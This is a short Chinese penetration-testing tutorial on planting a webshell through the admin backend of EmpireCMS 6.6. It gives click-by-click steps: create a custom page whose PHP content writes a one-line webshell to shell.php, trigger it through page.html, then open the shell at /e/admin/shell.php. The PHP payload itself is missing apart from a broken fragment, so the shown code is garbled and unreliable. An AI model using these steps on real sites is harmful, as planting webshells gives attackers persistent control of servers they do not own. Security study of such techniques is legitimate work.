121.网络安全渗透测试—[CMS后台 getwebshell]—[帝国empirecms6.6后台 getwebshell]
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!!
文章目录
- 一、帝国empirecms6.6后台 getwebshell
- 1、第一步:自定义页面
- 2、第二步:触发写入一句话
- 3、第三步:getwebshell
一、帝国empirecms6.6后台 getwebshell
1、第一步:自定义页面
登录后台---->栏目---->自定义页面---->增加自定义页面---->填写页面名称为wshell.php(随便)---->文件名默认是…/…/page.html---->文件内容为以下内容:功能是创建shell.php文件并写入一句话到shell.php文件中
')?>
2、第二步:触发写入一句话
栏目---->自定义页面---->管理自定义页面---->点击刚刚的page.html页面触发webshell(其实就是访问http://www.empirecms66.com/page.html)
3、第三步:getwebshell
访问生成的webshell:http://www.empirecms66.com/e/admin/shell.php
本文来自互联网用户投稿,文章观点仅代表作者本人,不代表本站立场,不承担相关法律责任。如若转载,请注明出处。 如若内容造成侵权/违法违规/事实不符,请点击【内容举报】进行投诉反馈!